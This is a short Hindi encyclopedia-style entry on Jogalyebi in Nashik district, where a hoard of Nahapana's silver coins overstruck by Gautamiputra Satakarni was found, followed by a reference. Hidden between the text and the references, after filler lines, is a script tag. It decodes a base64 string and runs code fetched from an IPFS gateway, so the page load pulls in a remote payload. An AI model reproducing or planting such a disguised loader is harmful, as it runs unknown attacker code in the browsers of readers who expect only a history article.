- महाराष्ट्र के नासिक ज़िले में जोगलयेबी स्थित है।
- इस स्थान पर शक नरेश नहपान तथा सातवाहन राजा गौतमी पुत्र (द्वितीय शती ई.) के सिक्कों का एक उल्लेखनीय भण्डार मिला है।
- गौतमी पुत्र के सिक्के वास्तव में नहपान की ही रजत मुद्राएँ हैं जिन पर गौतमी पुत्र ने अपना नाम अंकित करवा दिया था।
- इस ढ़ेर में चाँदी के बहुत से ऐसे सिक्के थे, जो महाक्षत्रप क्षहरात वंश के नहपान ने चलाये थे और जो दुबारा सातवाहन शासक गौतमीपुत्र सातकर्णि की मुद्रा से अंकित हैं।
- इससे महाराष्ट्र में शकवंशीय नहपान के पश्चात् सातवाहन (ब्राह्मण) राजाओं का शासन सिद्ध होता है।
|
|
|
|
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
टीका टिप्पणी और संदर्भ
- ऐतिहासिक स्थानावली| विजयेन्द्र कुमार माथुर | वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार, पृष्ठ संख्या - 371